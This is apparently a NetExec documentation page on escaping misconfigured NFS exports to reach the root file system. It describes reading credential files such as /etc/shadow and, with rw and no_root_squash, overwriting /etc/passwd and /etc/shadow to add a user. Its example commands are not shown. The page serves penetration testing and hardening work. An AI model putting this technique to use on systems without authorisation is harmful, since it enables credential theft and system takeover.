Escape to root file system
By default, NFS exports do not restrict access to files outside the exported directory. To access these files NFS needs the respective file handle. However, the root file handle / has a static value, which is file system dependend. Therefore, if one of the shares do not restrict access to the export directory by setting the "subtree_check" flag in their config, it is possible to query to root file system and from there every single file on the system.
NetExec automatically checks for this "escape to root" on connection, as can be seen by the flag:
This can be leveraged to access all files on the system which are not root:root owned, meaning all some non-root identity has read access to the file. A prominent example is the /etc/shadow file, which is owned by root:shadow. Furthermore, if the options "no_root_squash" is set, also root:root files can be read. In combination with the "rw" flag, anyone can also upload and overwrite any files on the system and therefore just add themselves as a user.
Recommendation: The file /etc/exports defines all exported directories with their config and is world readable. If you find a host where the root escape is possible, first download the file and check which options are available to you.
Leveraging the root escape
NetExec will automatically try to use the root escape if no share was specified in the command.
Example for --ls:
Owning the system: Demo
As mentioned above, when the options (rw,no_root_squash) are set, you can simply download the files /etc/shadow and /etc/passwd, add yourself and reupload them:
Additional sources:
Last updated
Was this helpful?
